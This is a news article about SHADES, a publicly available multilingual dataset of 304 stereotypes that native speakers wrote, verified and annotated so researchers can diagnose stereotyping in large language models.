

This data set helps researchers spot harmful stereotypes in LLMs


“I hope people will use [SHADES] as a diagnostic tool to identify where and how there might be problems in a model,” Talat says. “It’s a way of knowing what’s missing from a model, where we can’t be confident that a model performs well, and whether or not it’s accurate.”

To create the multilingual dataset, the team recruited native and fluent speakers of languages including Arabic, Chinese, and Dutch. They translated and wrote down all the stereotypes they could think of in their respective languages, which another native speaker then verified. Each speaker annotated each stereotype with the regions in which it was recognized, the group of people it targeted, and the type of bias it contained.

The participants then translated each stereotype into English, a language spoken by every contributor, before translating it into additional languages. The speakers then noted whether the translated stereotype was recognized in their language, producing a total of 304 stereotypes relating to people’s physical appearance, personal identity, and social factors such as their occupation.

The team is due to present its findings at the annual conference of the Nations of the Americas chapter of the Association for Computational Linguistics in May.

“It’s an exciting approach,” says Myra Cheng, a doctoral student at Stanford University who studies social bias in AI. “There’s good coverage of different languages and cultures that reflects their subtlety and nuance.”

Mitchell says she hopes other contributors will add new languages, stereotypes, and regions to SHADES, which is publicly available, leading to the development of better language models in the future. “It’s been a massive collaborative effort from people who want to help make better technology,” she says.

